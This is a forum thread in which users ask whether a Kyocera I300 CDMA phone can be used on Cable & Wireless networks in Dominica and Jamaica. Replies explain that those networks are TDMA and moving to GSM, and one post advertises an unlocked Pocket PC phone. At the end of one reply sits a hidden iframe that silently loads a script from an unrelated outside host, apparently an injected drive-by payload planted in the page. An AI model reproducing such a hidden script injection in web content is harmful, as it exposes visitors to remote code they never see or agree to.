+ Reply to Thread

I300 Usage Internationally

I will possibly be moving to the Caribbean island of Dominica in about four months, for the duration of about 1.5 years. I really wish to take my I300 with me, as otherwise it will sit useless. Does anyone know if the phone can connect to the local cellular network down there? I believe they are using Digital Cellular, so something along the lines of what Verizon provides (I think). All i know for sure is that the network is labeled "Digital Cellular." Not sure of the frequency in use. I had followed previous posts regarding the attempted connection of the I300 onto Verizon or other providers. Or, will I just be able to remain on Sprint and digital cellular roam internationally? Any approximation of how much THIS idea would cost me? Thanks! BTW, Cellular provider down there is called Cable & Wireless I believe.

No such luck...

Dominica, along with most of the other Caribean countries supported by Cable and Wireless are all TDMA, and moving toward GSM. They have no CDMA capacity. So, end result, your I300 will end up a very heavy, very large Palm while you are down there.

Unfortunately, there isn't even a Palm Phone solution for you while you are down there. They haven't transitioned to GSM yet, you you can rule out the Treo 180/270. Kyocera are too closely aligned with Qualcomm to create a TDMA version. Besides, TDMA isn't exactly great when it comes to data. I'd say, just get used to carrying two devices for a while.
    -Druce

i300 knucklehead

Thumbs down

Yeah, I already tried my i300 in Jamaica earlier this year. They are served by Cable & Wireless also but no dice. Nobody had a clue basically, although I swore I read somewhere one time about Sprint making inroads into the Caribbean...

We try to get down there at least once every other year, so I will remain optimistic, and try it again next trip down.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

makes me wonder why the world didnt just agree on one type of cellular service and one type of power system. oh well, thats what makes it all interesting...looks like my I300 will be a heavy palm...i think I will unscrew the antenna as that will be useless...

Originally posted by Stillen_I30
    makes me wonder why the world didnt just agree on one type of cellular service...
    Actually, the world has. It is called GSM. Only the countries lagging behind (aka the ones still dependant on TDMA) and the ones trying to protect a domestic standard (I.E. USA and Japan) aren't completely GSM.

Oh well. If I actually had to travel Internationally, it might be worth while to switch to Cingular, T-Mobile or (heaven forbid) AT&T for GSM. In the mean time, why trade good international roaming for poor domestic coverage. I am stuck with Sprint for a little while.
    -Druce

Napoleon Bonaparte Jr.

SIM Free & Unlocked

This Pocket PC Phone Edition does not include a SIM and is unlocked, meaning you can use it with the FIDO network or whichever GSM/GPRS network you prefer.
    http://www.handheldcanada.com/Mercha...te=ppcthoughts
    Attached Thumbnails Attached Thumbnails I300 Usage Internationally-ppcphone.gif